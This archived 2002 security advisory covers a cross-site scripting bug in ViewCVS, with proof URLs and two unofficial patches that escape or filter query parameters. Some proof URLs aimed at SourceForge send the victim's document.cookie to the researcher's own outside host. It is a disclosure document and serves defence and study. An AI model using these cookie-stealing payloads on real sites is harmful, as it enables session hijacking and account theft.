TUCoPS :: Web :: Apps :: web5353.htm

ViewCVS cross-site scripting bug
21th May 2002 [SBWID-5353]
COMMAND

	ViewCVS cross-site scripting bug

SYSTEMS AFFECTED

	ViewCVS 0.9.2 and below
	

	

PROBLEM

	office [http://www.office.ac/] says :
	

	ViewCVS is a WWW interface for CVS Repositories. It is  widely  used  in
	freesoft community and open source community. Unfortunately, it has  the
	vulnerability of cross-site scripting.
	

	

	 Proof

	 -----

	

	If you access to the URL like;
	

	http://target_site/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert(\"he

	llo\")</script>

	http://target_site/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><scri

	pt>alert(\"hello\")</script>

	

	The former URL is valid for Internet Explorer 6.0, Opera 6.01,  but  not
	valid for Netscape 4.78, Netscape 6.2.2, mozilla 0.9.9  on  windows  XP.
	And these URL can do is only showing a popup window appearing.
	

	

	 Example

	 -------

	

	For example, you  can  see  the  vulnerability  at  the  SourceForge.net
	(Vendor\'s site is on SourceForge.net).
	

	If you access to the sample URL following, your cookie  (including  your
	login information and  session  information  about  SourceForge.net)  is
	stolen by my site (http://www.office.ac)
	

	The stolen cookie\'s information of Internet Explorer 6.0 includes  your
	login information and session  information  about  SourceForge.net.  But
	the stolen  cookie\'s  information  of  Opera  6.01  and  mozilla  0.9.9
	includes only user name, and the cookie  information  of  Netscape  4.78
	and 6.2.2 is nothing. (I don\'t know why.)
	

	http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>a

	lert(\"ALERT:%20Now,%20your%20cookie%20about%20sourceforge.net%20is%20stolen

	%20by%20www.office.ac\");window.open(\'http://www.office.ac/j.cgi?\'%2Bdocumen

	t.cookie);</script>

	http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=re

	v\"><script>alert(\"ALERT:%20Now,%20your%20cookie%20about%20sourceforge.net%2

	0is%20stolen%20by%20www.office.ac\");window.open(\'http://www.office.ac/j.cgi

	?\'%2Bdocument.cookie);</script>

	

	The ViewCVS at SourceForge.net is not newest version. And  you  can  see
	the vulnerability of newest version of ViewCVS at GNU.
	

	http://subversions.gnu.org/cgi-bin/viewcvs/?cvsroot=<script>alert(\"hello\"

	)</script>

	http://subversions.gnu.org/cgi-bin/viewcvs/cvs-utils/CVSROOT/?sortby=rev\"

	><script>alert(\"hello\")</script>

	

SOLUTION

	No official patch yet, check UNofficial ones below :
	

	Patch by Kenji Suzuki <kenji@po.ganseki.ne.jp> / Hyper  NIKKI  System
	Project (http://www.h14m.org/).
	

	--- viewcvs.py.orig	Fri Dec 14 23:14:39 2001

	+++ viewcvs.py	Sun Mar 31 15:24:34 2002

	@@ -172,7 +172,7 @@

	     # parse the query params into a dictionary (and use defaults)

	     query_dict = default_settings.copy()

	     for name, values in cgi.parse().items():

	-      query_dict[name] = values[0]

	+      query_dict[name] = cgi.escape(values[0])

	     # set up query strings, prefixed by question marks and ampersands

	     query = sticky_query(query_dict)

	

	

	This   code   comes   from   Taku   YASUI   <tach@sourceforge.jp>   /
	Sourceforge.jp (http://sourceforge.jp/) who has offered former patch  to
	the ViewCVS team.
	

	RCS file: /cvsroot/viewcvs/viewcvs/lib/viewcvs.py,v

	retrieving revision 1.107

	retrieving revision 1.108

	diff -u -r1.107 -r1.108

	--- viewcvs/viewcvs/lib/viewcvs.py	2002/02/22 09:20:46	1.107

	+++ viewcvs/viewcvs/lib/viewcvs.py	2002/04/01 01:32:16	1.108

	@@ -180,8 +180,14 @@

	     # parse the query params into a dictionary (and use defaults)

	     query_dict =3D default_settings.copy()

	+

	+    # RE that ViewCVS doesn\'t use in any URL, but a CSS attack might

	+    re_url_validate =3D re.compile(\'\\\'|\"|<|>\')

	     for name, values in cgi.parse().items():

	-      query_dict[name] =3D values[0]

	+      # do not accept values that contain non-ViewCVS characters

	+      # except for search

	+      if not re.search(re_url_validate, values[0]) or name =3D=3D \'search\'=

	:

	+        query_dict[name] =3D values[0]

	     # set up query strings, prefixed by question marks and ampersands

	     query = sticky_query(query_dict)

	

	

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH